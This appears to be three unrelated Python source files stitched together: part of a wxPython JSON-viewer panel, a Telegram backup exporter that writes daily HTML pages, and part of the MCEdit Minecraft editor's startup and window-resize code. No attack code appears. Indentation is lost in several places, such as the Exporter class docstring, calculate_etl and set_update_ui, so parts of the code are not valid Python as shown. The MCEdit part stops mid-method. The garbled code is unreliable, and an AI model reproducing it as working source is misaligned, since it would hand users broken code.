    exponent = int(math.floor(math.log(size_bytes, 1024)))
    scaled = round(size_bytes / math.pow(1024, exponent), 2)
    return "%s %s" % (scaled, units[exponent])
def OnInputSourceChanged(self, evt=None):
    """Show only the option panel matching the selected input source."""
    _val= self.m_choice1.GetString(self.m_choice1.GetCurrentSelection())
    for _k in self._allTabs:
        if _k == _val:
            self._allTabs[_k].Show()
        else:
            self._allTabs[_k].Hide()
    self._currentInput= _val
    self.Layout()

def OnRefreshJobList(self, evt):
    """Button handler: refresh the job selector."""
    self.__RefreshJobList__(evt)

def __RefreshJobList__(self, evt=None):
    # Rebuild the job choice widget and cache each job's status JSON so
    # OnJobSelected can display it without re-querying the JobManager.
    listofJobJson = {}
    self.m_choice_job.Clear()
    jlist=self.parent_frame.JobManager.GetJobs()
    for _j in jlist:
        _jnameStr = _j.getJobFriendlyName()
        _jdatasJson = _j.ExportRemoteJobStatusJson(_withResult=True)
        self.m_choice_job.Append(_jnameStr)
        listofJobJson[_jnameStr]=_jdatasJson
    self._jobCache = listofJobJson
    #return listofJobJson

def OnJobSelected(self,evt=None):
    """Display the cached status JSON of the selected job."""
    _val= self.m_choice_job.GetString(self.m_choice_job.GetCurrentSelection())
    jsondatas = self._jobCache[_val]
    self._currentJson = jsondatas
    self.UpdateView(None)

def OnFileChanged(self, evt=None, forceFile=''):
    """File-picker handler: load the chosen file (or *forceFile* when given)."""
    print('OnFileChanged')
    self._lastFileName = str(self.m_filePicker1.GetPath())
    if forceFile != '':
        self._lastFileName = forceFile
    self.__LoadTextFile__(self._lastFileName)
def __LoadTextFile__(self, file):
    """Load a JSON document from *file* and refresh the tree view.

    Tries strict JSON first; on failure, falls back to Python-literal
    parsing (ast.literal_eval) so repr-style dict files also load.
    Shows a UserError dialog when both parsers fail.
    """
    try:
        # File handle is closed deterministically via the with-block.
        with open(file, 'r') as f:
            data = json.load(f)
        self._currentJson = data
        self.UpdateView(None)
        return
    except Exception:
        # Fall through to the Python-literal parser below.
        pass
    try:
        # ast is imported at module level; literal_eval parses Python
        # literals safely (unlike eval). The original leaked this file
        # handle by never closing it.
        with open(file, "r") as f:
            jsonData = ast.literal_eval(f.read())
        self._currentJson = jsonData
        self.UpdateView(None)
    except Exception as e:
        UserError(self.parent_frame, f"Invalid JSON File or Data : {e}")
def OnLoadURLClicked(self, evt):
    """Button handler: fetch and display JSON from the entered URL."""
    print('OnLoadURLClicked')
    _url = self.m_textCtrl3.GetValue()
    self.__LoadUrl__(_url)

def __LoadUrl__(self, url):
    # Fetch *url* and display its JSON response; report failures in a dialog.
    try:
        response = requests.get(url)
        data = response.json()
        self._currentJson = data
        self.UpdateView(None)
        #print(data)
    except Exception as e:
        UserError(self.parent_frame, f"Invalid JSON URL or Data : {e}")

def __LoadRaw__(self, strData):
    # Parse *strData* as JSON; on failure retry as a Python literal
    # (ast.literal_eval) so repr-style dicts also work.
    print('__LoadTextFile__')
    _excp=False
    try:
        data = json.loads(strData)
        self._currentJson = data
        self.UpdateView(None)
    except Exception as e:
        _excp = True
        #UserError(self.parent_frame, f"Invalid JSON File or Data : {e}")
    if _excp:
        try:
            jsonData = ast.literal_eval(strData)
            self._currentJson = jsonData
            self.UpdateView(None)
        except Exception as e:
            UserError(self.parent_frame, f"Invalid JSON File or Data : {e}")

def OnRawTextChanged(self,evt=None):
    """Re-parse the RAW text box on every edit."""
    self.__LoadRaw__(self.m_textCtrl6.GetValue())

def OnPasteRawClicked(self, evt):
    """Paste clipboard contents into the RAW text box (triggers a re-parse)."""
    s = libs.pyperclip.paste()
    self.m_textCtrl6.SetValue(s)
|
exporter.py | from datetime import date, timedelta, datetime
from os import path, makedirs
from shutil import copyfile
from threading import Thread
from os.path import isfile
from telethon.tl.types import MessageService
from exporter import HTMLTLWriter
from media_handler import MediaHandler
from tl_database import TLDatabase
class Exporter:
"""Class used to export database files"""
# Default output directory for all the exported backups
export_dir = 'backups/exported'
def __init__(self, backups_dir, name):
    """Create an exporter for the backup stored in *backups_dir*.

    Output is written under '<Exporter.export_dir>/<name>'.
    """
    self.backups_dir = backups_dir
    self.name = name
    self.output_dir = path.join(Exporter.export_dir, name)
    self.media_handler = MediaHandler(self.output_dir)
#region Exporting databases
def export(self, callback=None):
    """Exports the given database with the specified name.
    An optional callback function can be given with one
    dictionary parameter containing progress information
    (saved_msgs, total_msgs, etl)"""
    # Run asynchronously so the caller (e.g. a GUI) is not blocked.
    Thread(target=self.export_thread, kwargs={ 'callback': callback }).start()
def copy_default_media(self):
    """Copies the default media and style sheets to the output directory"""
    makedirs(self.output_dir, exist_ok=True)
    copyfile('exporter/resources/style.css', path.join(self.output_dir, 'style.css'))
    # Create the media folder structure, then drop in the placeholder images
    # used when a profile picture or photo is missing.
    self.media_handler.make_tree()
    copyfile('exporter/resources/default_propic.png',
             self.media_handler.get_default_file('propics'))
    copyfile('exporter/resources/default_photo.png',
             self.media_handler.get_default_file('photos'))
def export_thread(self, callback):
    """The exporting a conversation method (should be ran in a different thread).

    Walks all messages in the backup database in id order, writing one
    HTML file per calendar day and copying referenced media next to it.
    *callback*, when given, is invoked with a progress dict per message.
    """
    with TLDatabase(self.backups_dir) as db:
        db_media_handler = MediaHandler(self.backups_dir)

        # First copy the default media files
        self.copy_default_media()

        progress = {
            'exported': 0,
            'total': db.count('messages'),
            'etl': 'Unknown'
        }

        # The first date will obviously be the first day
        # TODO This fails if there are 0 messages in the database, export should be disabled!
        previous_date = self.get_message_date(db.query_message('order by id asc'))
        # Also find the next day
        following_date = self.get_previous_and_next_day(db, previous_date)[1]

        # Set the first writer (which will have the "previous" date, the first one)
        writer = HTMLTLWriter(previous_date, self.media_handler,
                              following_date=following_date)
        # Keep track from when we started to determine the estimated time left
        start = datetime.now()

        # Export the profile photos, from users chats and channels
        # TODO This should also have a progress if we have a backup of thousands of files!
        for user in db.query_users():
            if user.photo:
                source = db_media_handler.get_propic_path(user)
                output = self.media_handler.get_propic_path(user)
                if isfile(source):
                    copyfile(source, output)

        # Iterate over all the messages to export them in their respective days
        for msg in db.query_messages('order by id asc'):
            msg_date = self.get_message_date(msg)
            progress['exported'] += 1

            # As soon as we're in the next day, update the output the writer
            if msg_date != previous_date:
                # Exit the previous writer to end the header
                writer.__exit__(None, None, None)
                # Update date values and create a new instance
                previous_date, following_date =\
                    self.get_previous_and_next_day(db, msg_date)
                writer = HTMLTLWriter(msg_date, self.media_handler,
                                      previous_date=previous_date,
                                      following_date=following_date)

            # Call the callback
            if callback:
                progress['etl'] = self.calculate_etl(start, progress['exported'], progress['total'])
                callback(progress)
            else:
                print(progress)

            writer.write_message(msg, db)
            # If the message has media, we need to copy it so it's accessible by the exported HTML
            if not isinstance(msg, MessageService) and msg.media:
                source = db_media_handler.get_msg_media_path(msg)
                output = self.media_handler.get_msg_media_path(msg)
                # Source may be None if the media is unsupported (i.e. a webpage)
                if source and isfile(source):
                    copyfile(source, output)
            previous_date = msg_date

        # Always exit at the end
        writer.__exit__(None, None, None)

        # Call the callback to notify we've finished
        if callback:
            progress['etl'] = timedelta(seconds=0)
            callback(progress)
#endregion
#region Utilities
@staticmethod
def get_previous_and_next_day(db, message_date):
    """Gets the previous and following saved days given the day in between in the database"""
    # NOTE(review): queries are built via string formatting. message_date
    # comes from the local backup database (a date object), not user input,
    # but a parameterized query would still be the safer pattern.
    previous = db.query_message("where date < '{}' order by id desc"
                                .format(message_date))
    following = db.query_message("where date >= '{}' order by id asc"
                                 .format(message_date+timedelta(days=1)))
    return Exporter.get_message_date(previous), Exporter.get_message_date(following)
@staticmethod
def calculate_etl(start, saved, total):
"""Calculates the estimated time left, based on how long it took us
to reach "saved" and how many messages we have left"""
delta_time = (datetime.now() - start).total_seconds() / saved
left = total - saved
return timedelta(seconds=round(left * delta_time, 1))
@staticmethod
def get_message_date(message):
"""Retrieves the given message DATE, ignoring the time (hour, minutes, seconds, etc.)"""
if message:
return date(year=message.date.year, month=message.date.month, day=message.date.day)
#endregion
|
mcedit.py | # !/usr/bin/env python2.7
# -*- coding: utf_8 -*-
# import resource_packs # not the right place, moving it a bit further
#-# Modified by D.C.-G. for translation purpose
#.# Marks the layout modifications. -- D.C.-G.
"""
mcedit.py
Startup, main menu, keyboard configuration, automatic updating.
"""
import splash
import OpenGL
import sys
import os
if "-debug" not in sys.argv:
OpenGL.ERROR_CHECKING = False
import logging
# Setup file and stderr logging.
logger = logging.getLogger()
# Set the log level up while importing OpenGL.GL to hide some obnoxious warnings about old array handlers
logger.setLevel(logging.WARN)
logger.setLevel(logging.DEBUG)
logfile = 'mcedit.log'
# if hasattr(sys, 'frozen'):
# if sys.platform == "win32":
# import esky
# app = esky.Esky(sys.executable)
# logfile = os.path.join(app.appdir, logfile)
#
if sys.platform == "darwin":
logfile = os.path.expanduser("~/Library/Logs/mcedit.log")
else:
logfile = os.path.join(os.getcwdu(), logfile)
fh = logging.FileHandler(logfile, mode="w")
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.WARN)
if "--log-info" in sys.argv:
ch.setLevel(logging.INFO)
if "--log-debug" in sys.argv:
ch.setLevel(logging.DEBUG)
class FileLineFormatter(logging.Formatter):
    """logging.Formatter exposing '%(fileline)s' and '%(nameline)s' fields.

    Each combines the record's location into a single "file.py:lineno"
    token so format strings can show a compact source reference.
    """
    def format(self, record):
        # Inject the synthetic fields before delegating to the base formatter.
        record.__dict__['fileline'] = "%(module)s.py:%(lineno)d" % record.__dict__
        record.__dict__['nameline'] = "%(name)s.py:%(lineno)d" % record.__dict__
        return super(FileLineFormatter, self).format(record)
# Install the custom formatter on both the file and console log handlers.
fmt = FileLineFormatter(
    '[%(levelname)8s][%(nameline)30s]:%(message)s'
)
fh.setFormatter(fmt)
ch.setFormatter(fmt)
logger.addHandler(fh)
logger.addHandler(ch)

import release

start_msg = 'Starting MCEdit-Unified v%s'%release.TAG
logger.info(start_msg)
print '[ ****** ] ~~~~~~~~~~ %s'%start_msg

from version_utils import PlayerCache
import directories
import keys
import albow
import locale

# Default text encoding; fall back to UTF-8 when the platform reports none.
DEF_ENC = locale.getdefaultlocale()[1]
if DEF_ENC is None:
    DEF_ENC = "UTF-8"

from albow.translate import _, getPlatInfo
from albow.openglwidgets import GLViewport
from albow.root import RootWidget
from config import config

albow.resource.resource_dir = directories.getDataDir()

import panels
import leveleditor

# Building translation template
if "-tt" in sys.argv:
    sys.argv.remove('-tt')
    # Overwrite the default marker to have one adapted to our specific needs.
    albow.translate.buildTemplateMarker = """
### THE FOLLOWING LINES HAS BEEN ADDED BY THE TEMPLATE UPDATE FUNCTION.
### Please, consider to analyze them and remove the entries referring
### to ones containing string formatting.
###
### For example, if you have a line already defined with this text:
### My %{animal} has %d legs.
### you may find lines like these below:
### My parrot has 2 legs.
### My dog has 4 legs.
###
### You also may have unwanted partial strings, especially the ones
### used in hotkeys. Delete them too.
### And, remove this paragraph, or it will be displayed in the program...
"""
    albow.translate.buildTemplate = True
    albow.translate.loadTemplate()
    # Save the language defined in config and set en_US as current one.
    logging.warning('MCEdit is invoked to update the translation template.')
    orglang = config.settings.langCode.get()
    logging.warning('The actual language is %s.'%orglang)
    logging.warning('Setting en_US as language for this session.')
    config.settings.langCode.set('en_US')

import mceutils
import mcplatform

# The two next switches '--debug-wm' and '--no-wm' are used to debug/disable the internal window handler.
# They are exclusive. You can't debug if it is disabled.
if "--debug-wm" in sys.argv:
    mcplatform.DEBUG_WM = True
if "--no-wm" in sys.argv:
    mcplatform.DEBUG_WM = False
    mcplatform.USE_WM = False
else:
    mcplatform.setupWindowHandler()
DEBUG_WM = mcplatform.DEBUG_WM
USE_WM = mcplatform.USE_WM

#-# DEBUG
if mcplatform.hasXlibDisplay and DEBUG_WM:
    print '*** Xlib version', str(mcplatform.Xlib.__version__).replace(' ', '').replace(',', '.')[1:-1], 'found in',
    if os.path.expanduser('~/.local/lib/python2.7/site-packages') in mcplatform.Xlib.__file__:
        print 'user\'s',
    else:
        print 'system\'s',
    print 'libraries.'
#-#

from mcplatform import platform_open
import numpy
from pymclevel.minecraft_server import ServerJarStorage
import os
import os.path
import pygame
from pygame import display, rect
import pymclevel
# import release
import shutil
import sys
import traceback
import threading
from utilities.gl_display_context import GLDisplayContext
#&# Prototype for blocks/items names
import mclangres
#&#
getPlatInfo(OpenGL=OpenGL, numpy=numpy, pygame=pygame)

ESCAPE = '\033'
class MCEdit(GLViewport):
    """Top-level MCEdit widget: owns the panels, the level editor and the
    native window (including Linux/X11 window-manager integration)."""
    # Default text encoding detected at module import time.
    def_enc = DEF_ENC

    def __init__(self, displayContext, *args):
        """Build all panels and sub-widgets.

        displayContext: the GLDisplayContext wrapping the pygame/OpenGL window.
        *args are ignored.
        """
        if DEBUG_WM:
            print "############################ __INIT__ ###########################"
        self.resizeAlert = config.settings.showWindowSizeWarning.get()
        self.maximized = config.settings.windowMaximized.get()
        self.saved_pos = config.settings.windowX.get(), config.settings.windowY.get()
        if displayContext.win and DEBUG_WM:
            print "* self.displayContext.win.state", displayContext.win.get_state()
            print "* self.displayContext.win.position", displayContext.win.get_position()
        self.dis = None
        self.win = None
        self.wParent = None
        self.wGrandParent = None
        self.linux = False
        if sys.platform == 'linux2' and mcplatform.hasXlibDisplay:
            # On Linux, resolve the X11 window hierarchy so maximize/geometry
            # events can be routed to the right ancestor window; the layout of
            # that hierarchy depends on the desktop environment.
            self.linux = True
            self.dis = dis = mcplatform.Xlib.display.Display()
            self.win = win = dis.create_resource_object('window', display.get_wm_info()['window'])
            curDesk = os.environ.get('XDG_CURRENT_DESKTOP')
            if curDesk in ('GNOME', 'X-Cinnamon', 'Unity'):
                self.geomReciever = self.maximizeHandler = wParent = win.query_tree().parent
                self.geomSender = wGrandParent = wParent.query_tree().parent
            elif curDesk == 'KDE':
                self.maximizeHandler = win.query_tree().parent
                wParent = win.query_tree().parent.query_tree().parent
                wGrandParent = wParent.query_tree().parent.query_tree().parent
                self.geomReciever = self.geomSender = win.query_tree().parent.query_tree().parent.query_tree().parent
            else:
                # Unknown desktop: window-manager integration is disabled.
                self.maximizeHandler = self.geomReciever = self.geomSender = wGrandParent = wParent = None
            self.wParent = wParent
            self.wGrandParent = wGrandParent
            # Diagnostic dump of the resolved window hierarchy.
            # NOTE(review): these prints run whenever Xlib is available on
            # linux2 — confirm whether they should be guarded by DEBUG_WM.
            root = dis.screen().root
            windowID = root.get_full_property(dis.intern_atom('_NET_ACTIVE_WINDOW'), mcplatform.Xlib.X.AnyPropertyType).value[0]
            print "###\nwindowID", windowID
            window = dis.create_resource_object('window', windowID)
            print "###\nwindow.get_geometry()", window.get_geometry()
            print "###\nself.win", self.win.get_geometry()
            print "###\nself.wParent.get_geometry()", self.wParent.get_geometry()
            print "###\nself.wGrandParent.get_geometry()", self.wGrandParent.get_geometry()
            try:
                print "###\nself.wGrandParent.query_tree().parent.get_geometry()", self.wGrandParent.query_tree().parent.get_geometry()
            except:
                pass
            print "###\nself.maximizeHandler.get_geometry()", self.maximizeHandler.get_geometry()
            print "###\nself.geomReciever.get_geometry()", self.geomReciever.get_geometry()
            print "###\nself.geomSender.get_geometry()", self.geomSender.get_geometry()
            print "###\nself.win", self.win
            print "###\nself.wParent", self.wParent
            print "###\nself.wGrandParent", self.wGrandParent
            print "###\nself.maximizeHandler", self.maximizeHandler
            print "###\nself.geomReciever", self.geomReciever
            print "###\nself.geomSender", self.geomSender
        ws = displayContext.getWindowSize()
        r = rect.Rect(0, 0, ws[0], ws[1])
        GLViewport.__init__(self, r)
        if DEBUG_WM:
            print "self.size", self.size, "ws", ws
        if displayContext.win and self.maximized:
            # Send a maximize event now
            displayContext.win.set_state(mcplatform.MAXIMIZED)
            # Flip pygame.display to avoid to see the splash un-centered.
            pygame.display.flip()
        self.displayContext = displayContext
        self.bg_color = (0, 0, 0, 1)
        self.anchor = 'tlbr'
        if not config.config.has_section("Recent Worlds"):
            config.config.add_section("Recent Worlds")
            self.setRecentWorlds([""] * 5)
        self.optionsPanel = panels.OptionsPanel(self)
        if not albow.translate.buildTemplate:
            # Normal run (not template building): pick the configured language,
            # falling back to en_US when it is not among the available choices.
            self.optionsPanel.getLanguageChoices()
            lng = config.settings.langCode.get()
            if lng not in self.optionsPanel.sgnal:
                lng = "en_US"
                config.settings.langCode.set(lng)
            albow.translate.setLang(lng)
        # Set the window caption here again, since the initialization is done through several steps...
        display.set_caption(('MCEdit ~ ' + release.get_version()%_("for")).encode('utf-8'), 'MCEdit')
        self.optionsPanel.initComponents()
        self.graphicsPanel = panels.GraphicsPanel(self)
        #&# Prototype for blocks/items names
        mclangres.buildResources(lang=albow.translate.getLang())
        #&#
        #.#
        self.keyConfigPanel = keys.KeyConfigPanel(self)
        #.#
        self.droppedLevel = None
        self.nbtCopyBuffer = None
        self.reloadEditor()
        """
        check command line for files dropped from explorer
        """
        if len(sys.argv) > 1:
            for arg in sys.argv[1:]:
                f = arg.decode(sys.getfilesystemencoding())
                # A bare world-folder name is resolved against the saves dir.
                if os.path.isdir(os.path.join(pymclevel.minecraftSaveFileDir, f)):
                    f = os.path.join(pymclevel.minecraftSaveFileDir, f)
                    self.droppedLevel = f
                    break
                if os.path.exists(f):
                    self.droppedLevel = f
                    break
        self.fileOpener = albow.FileOpener(self)
        self.add(self.fileOpener)
        self.fileOpener.focus()
#-# Translation live updtate preparation
def set_update_ui(self, v):
GLViewport.set_update_ui(self, v)
if v:
#&# Prototype for blocks/items names
mclangres.buildResources(lang=albow.translate.getLang())
#&#
self.keyConfigPanel = keys.KeyConfigPanel(self)
self.graphicsPanel = panels.GraphicsPanel(self)
if self.fileOpener in self.subwidgets:
idx = self.subwidgets.index(self.fileOpener)
self.remove(self.fileOpener)
self.fileOpener = albow.FileOpener(self)
if idx is not None:
self.add(self.fileOpener)
self.fileOpener.focus()
#-#
    # Current LevelEditor instance; None until reloadEditor() first runs.
    editor = None

    def reloadEditor(self):
        """(Re)build the level editor, preserving the open level and the
        camera position/orientation across the module reload."""
        reload(leveleditor)
        level = None
        pos = None
        if self.editor:
            level = self.editor.level
            self.remove(self.editor)
            c = self.editor.mainViewport
            pos, yaw, pitch = c.position, c.yaw, c.pitch
        self.editor = leveleditor.LevelEditor(self)
        self.editor.anchor = 'tlbr'
        if level:
            # Restore the previously open level and camera state.
            self.add(self.editor)
            self.editor.gotoLevel(level)
            self.focus_switch = self.editor
            if pos is not None:
                c = self.editor.mainViewport
                c.position, c.yaw, c.pitch = pos, yaw, pitch
    def add_right(self, widget):
        """Dock *widget* against the right edge, vertically centered."""
        w, h = self.size
        widget.centery = h // 2
        widget.right = w
        self.add(widget)

    def showOptions(self):
        """Open the main options panel."""
        self.optionsPanel.present()

    def showGraphicOptions(self):
        """Open the graphics options panel."""
        self.graphicsPanel.present()

    def showKeyConfig(self):
        """Open the keyboard-binding configuration panel."""
        self.keyConfigPanel.presentControls()

    def loadRecentWorldNumber(self, i):
        """Load the i-th (1-based) entry of the recent-worlds list."""
        worlds = list(self.recentWorlds())
        if i - 1 < len(worlds):
            self.loadFile(worlds[i - 1])

    # Maximum number of entries kept in the "Recent Worlds" config section.
    numRecentWorlds = 5
@staticmethod
def removeLevelDat(filename):
if filename.endswith("level.dat"):
filename = os.path.dirname(filename)
return filename
    def recentWorlds(self):
        """Return the recent world paths (from the "Recent Worlds" config
        section) that still exist on disk."""
        worlds = []
        for i in range(self.numRecentWorlds):
            if config.config.has_option("Recent Worlds", str(i)):
                try:
                    filename = (config.config.get("Recent Worlds", str(i)).decode('utf-8'))
                    worlds.append(self.removeLevelDat(filename))
                except Exception, e:
                    # A malformed/undecodable entry is logged and skipped.
                    logging.error(repr(e))
        return list((f for f in worlds if f and os.path.exists(f)))

    def addRecentWorld(self, filename):
        """Push *filename* onto the recent-worlds list (most recent first),
        dropping the oldest entry and avoiding duplicates."""
        filename = self.removeLevelDat(filename)
        rw = list(self.recentWorlds())
        if filename in rw:
            return
        rw = [filename] + rw[:self.numRecentWorlds - 1]
        self.setRecentWorlds(rw)

    @staticmethod
    def setRecentWorlds(worlds):
        """Persist *worlds* into the "Recent Worlds" config section."""
        for i, filename in enumerate(worlds):
            config.config.set("Recent Worlds", str(i), filename.encode('utf-8'))
    def makeSideColumn1(self):
        """Build the first sidebar column: panel shortcuts, web links and
        maintenance actions. Returns an albow.HotkeyColumn."""
        def showLicense():
            platform_open(os.path.join(directories.getDataDir(), "LICENSE.txt"))

        def refresh():
            PlayerCache().force_refresh()

        # (hotkey-label, title, action[, tooltip]) tuples for HotkeyColumn.
        hotkeys = ([("",
                     "Controls",
                     self.showKeyConfig),
                    ("",
                     "Graphics",
                     self.showGraphicOptions),
                    ("",
                     "Options",
                     self.showOptions),
                    ("",
                     "Homepage",
                     lambda: platform_open("http://www.mcedit-unified.net"),
                     "http://www.mcedit-unified.net"),
                    ("",
                     "About MCEdit",
                     lambda: platform_open("http://www.mcedit-unified.net/about.html"),
                     "http://www.mcedit-unified.net/about.html"),
                    ("",
                     "License",
                     showLicense,
                     os.path.join(directories.getDataDir(), "LICENSE.txt")),
                    ("",
                     "Refresh Player Names",
                     refresh)
                    ])

        c = albow.HotkeyColumn(hotkeys)
        return c

    def makeSideColumn2(self):
        """Build the second sidebar column: quick access to the config and
        screenshots directories. Returns an albow.HotkeyColumn."""
        def showCacheDir():
            try:
                os.mkdir(directories.getCacheDir())
            except OSError:
                # Directory already exists.
                pass
            platform_open(directories.getCacheDir())

        def showScreenshotsDir():
            try:
                os.mkdir(os.path.join(directories.getCacheDir(), "screenshots"))
            except OSError:
                pass
            platform_open(os.path.join(directories.getCacheDir(), "screenshots"))

        hotkeys = ([("",
                     "Config Files",
                     showCacheDir,
                     directories.getCacheDir()),
                    ("",
                     "Screenshots",
                     showScreenshotsDir,
                     os.path.join(directories.getCacheDir(), "screenshots"))
                    ])

        c = albow.HotkeyColumn(hotkeys)
        return c
    def resized(self, dw, dh):
        """
        Handle window resizing events.

        dw, dh: width/height deltas reported by the toolkit. Enforces the
        1000x680 minimum size (with a dismissible warning dialog), keeps the
        config in sync with the real window geometry, and tracks the
        maximized state via the native window handler when available.
        """
        if DEBUG_WM:
            print "############################ RESIZED ############################"
        (w, h) = self.size
        config_w, config_h = config.settings.windowWidth.get(), config.settings.windowHeight.get()
        win = self.displayContext.win
        if DEBUG_WM and win:
            print "dw", dw, "dh", dh
            print "self.size (w, h) 1", self.size, "win.get_size", win.get_size()
            print "size 1", config_w, config_h
        elif DEBUG_WM and not win:
            print "win is None, unable to print debug messages"
        if win:
            x, y = win.get_position()
            if DEBUG_WM:
                print "position", x, y
                print "config pos", (config.settings.windowX.get(), config.settings.windowY.get())
        if w == 0 and h == 0:
            # The window has been minimized, no need to draw anything.
            self.editor.renderer.render = False
            return
        # Mac window handling works better now, but `win`
        # doesn't exist. So to get this alert to show up
        # I'm checking if the platform is darwin. This only
        # works because the code block never actually references
        # `win`, otherwise it WOULD CRASH!!!
        # You cannot change further if statements like this
        # because they reference `win`
        if win or sys.platform == "darwin":
            # Handling too small resolutions.
            # Dialog texts.
            # "MCEdit does not support window resolutions below 1000x700.\nYou may not be able to access all functions at this resolution."
            # New buttons:
            # "Don't warn me again": disable the window popup across sessions.
            # Tooltip: "Disable this message. Definitively. Even the next time you start MCEdit."
            # "OK": dismiss the window and let go, don't pop up again for the session
            # Tooltip: "Continue and not see this message until you restart MCEdit"
            # "Cancel": resizes the window to the minimum size
            # Tooltip: "Resize the window to the minimum recommended resolution."
            # If the config showWindowSizeWarning is true and self.resizeAlert is true, show the popup
            if (w < 1000 or h < 680) and config.settings.showWindowSizeWarning.get():
                _w = w
                _h = h
                if self.resizeAlert:
                    answer = "_OK"
                    # Force the size only for the dimension that needs it.
                    if w < 1000 and h < 680:
                        _w = 1000
                        _h = 680
                    elif w < 1000:
                        _w = 1000
                    elif h < 680:
                        _h = 680
                    if not albow.dialogs.ask_tied_to:
                        answer = albow.ask(
                            "MCEdit does not support window resolutions below 1000x700.\nYou may not be able to access all functions at this resolution.",
                            ["Don't remind me again.", "OK", "Cancel"], default=1, cancel=1,
                            responses_tooltips = {"Don't remind me again.": "Disable this message. Definitively. Even the next time you start MCEdit.",
                                                  "OK": "Continue and not see this message until you restart MCEdit",
                                                  "Cancel": "Resize the window to the minimum recommended resolution."},
                            tie_widget_to=True)
                    else:
                        # A tied dialog already exists: re-show it instead of
                        # stacking a new one.
                        if not albow.dialogs.ask_tied_to._visible:
                            albow.dialogs.ask_tied_to._visible = True
                            answer = albow.dialogs.ask_tied_to.present()
                    if answer == "Don't remind me again.":
                        config.settings.showWindowSizeWarning = False
                        self.resizeAlert = False
                    elif answer == "OK":
                        w, h = self.size
                        self.resizeAlert = False
                    elif answer == "Cancel":
                        # Snap back to the minimum recommended size.
                        w, h = _w, _h
                else:
                    if albow.dialogs.ask_tied_to:
                        albow.dialogs.ask_tied_to.dismiss("_OK")
                        del albow.dialogs.ask_tied_to
                        albow.dialogs.ask_tied_to = None
            elif (w >= 1000 or h >= 680):
                # Size is acceptable again: tear down any lingering warnings.
                if albow.dialogs.ask_tied_tos:
                    for ask_tied_to in albow.dialogs.ask_tied_tos:
                        ask_tied_to._visible = False
                        ask_tied_to.dismiss("_OK")
                        ask_tied_to.set_parent(None)
                        del ask_tied_to
        if not win:
            # No native window handler: clamp to the minimum in the config.
            if w < 1000:
                config.settings.windowWidth.set(1000)
                w = 1000
                x = config.settings.windowX.get()
            if h < 680:
                config.settings.windowHeight.set(680)
                h = 680
                y = config.settings.windowY.get()
        if not self.editor.renderer.render:
            self.editor.renderer.render = True
        save_geom = True
        if win:
            maximized = win.get_state() == mcplatform.MAXIMIZED
            sz = map(max, win.get_size(), (w, h))
            if DEBUG_WM:
                print "sz", sz
                print "maximized", maximized, "self.maximized", self.maximized
            if maximized:
                if DEBUG_WM:
                    print "maximize, saving maximized size"
                # Remember the maximized geometry separately; the normal
                # width/height settings keep the restored size.
                config.settings.windowMaximizedWidth.set(sz[0])
                config.settings.windowMaximizedHeight.set(sz[1])
                config.save()
                self.saved_pos = config.settings.windowX.get(), config.settings.windowY.get()
                save_geom = False
                self.resizing = 0
                win.set_mode(sz, self.displayContext.displayMode())
            else:
                if DEBUG_WM:
                    print "size 2", config.settings.windowWidth.get(), config.settings.windowHeight.get()
                    print "config_w", config_w, "config_h", config_h
                    print "pos", config.settings.windowX.get(), config.settings.windowY.get()
                if self.maximized != maximized:
                    # Just un-maximized: restore the saved size and position.
                    if DEBUG_WM:
                        print "restoring window pos and size"
                        print "(config.settings.windowX.get(), config.settings.windowY.get())", (config.settings.windowX.get(), config.settings.windowY.get())
                    (w, h) = (config_w, config_h)
                    win.set_state(1, (w, h), self.saved_pos)
                else:
                    if DEBUG_WM:
                        print "window resized"
                        print "setting size to", (w, h), "and pos to", (x,y)
                    win.set_mode((w, h), self.displayContext.displayMode())
                    win.set_position((x, y))
                config.settings.windowMaximizedWidth.set(0)
                config.settings.windowMaximizedHeight.set(0)
                config.save()
            self.maximized = maximized
        if DEBUG_WM:
            print "self.size (w, h) 2", self.size, (w, h)
            surf = pygame.display.get_surface()
            print "display surf rect", surf.get_rect()
            if win:
                if hasattr(win.base_handler, 'get_geometry'):
                    print "win.base_handler geometry", win.base_handler.get_geometry()
                    print "win.base_handler.parent geometry", win.base_handler.query_tree().parent.get_geometry()
                    print "win.base_handler.parent.parent geometry", win.base_handler.query_tree().parent.query_tree().parent.get_geometry()
        if save_geom:
            config.settings.windowWidth.set(w)
            config.settings.windowHeight.set(h)
            config.save()
        # The alert window is disabled if win is not None
        if not win and (dw > 20 or dh > 20):
            if not hasattr(self, 'resizeAlert'):
                self.resizeAlert = self.shouldResizeAlert
            if self.resizeAlert:
                albow.alert(
                    "Window size increased. You may have problems using the cursor until MCEdit is restarted.")
                self.resizeAlert = False
        if win:
            win.sync()
        GLViewport.resized(self, dw, dh)
    # Config-backed property controlling the one-shot resize warning.
    shouldResizeAlert = config.settings.shouldResizeAlert.property()

    def loadFile(self, filename, addToRecent=True):
        """Load a world file into the editor.

        On success the file opener is removed and the editor takes focus;
        on failure the error is logged and the UI is left unchanged.
        """
        if os.path.exists(filename):
            try:
                self.editor.loadFile(filename, addToRecent=addToRecent)
            except Exception, e:
                logging.error(u'Failed to load file {0}: {1!r}'.format(
                    filename, e))
                return None
            self.remove(self.fileOpener)
            self.fileOpener = None
            if self.editor.level:
                self.editor.size = self.size
                self.add(self.editor)
                self.focus_switch = self.editor
    def createNewWorld(self):
        """Ask the editor to create a new level; on success swap the file
        opener out for the editor and notify the user."""
        level = self.editor.createNewLevel()
        if level:
            self.remove(self.fileOpener)
            self.editor.size = self.size
            self.add(self.editor)
            self.focus_switch = self.editor
            albow.alert(
                "World created. To expand this infinite world, explore the world in Minecraft or use the Chunk Control tool to add or delete chunks.")

    def removeEditor(self):
        """Close the editor view and show a fresh file-opener panel."""
        self.remove(self.editor)
        self.fileOpener = albow.FileOpener(self)
        self.add(self.fileOpener)
        self.focus_switch = self.fileOpener
    def confirm_quit(self):
        """Quit handler: persist window/config state, then either quit
        directly or ask the user what to do about unsaved edits.

        Returns False when the user cancels; otherwise raises SystemExit
        (possibly via saveAndQuit/justQuit).
        """
        #-# saving language template
        if hasattr(albow.translate, "saveTemplate"):
            albow.translate.saveTemplate()
        #-#
        self.saveWindowPosition()
        config.save()
        if self.editor.unsavedEdits:
            # if config.settings.savePositionOnClose.get():
            #     self.editor.waypointManager.saveLastPosition(self.editor.mainViewport, self.editor.level.getPlayerDimension())
            # self.editor.waypointManager.save()
            result = albow.ask(_("There are {0} unsaved changes.").format(self.editor.unsavedEdits),
                               responses=["Save and Quit", "Quit", "Cancel"])
            if result == "Save and Quit":
                self.saveAndQuit()
            elif result == "Quit":
                self.justQuit()
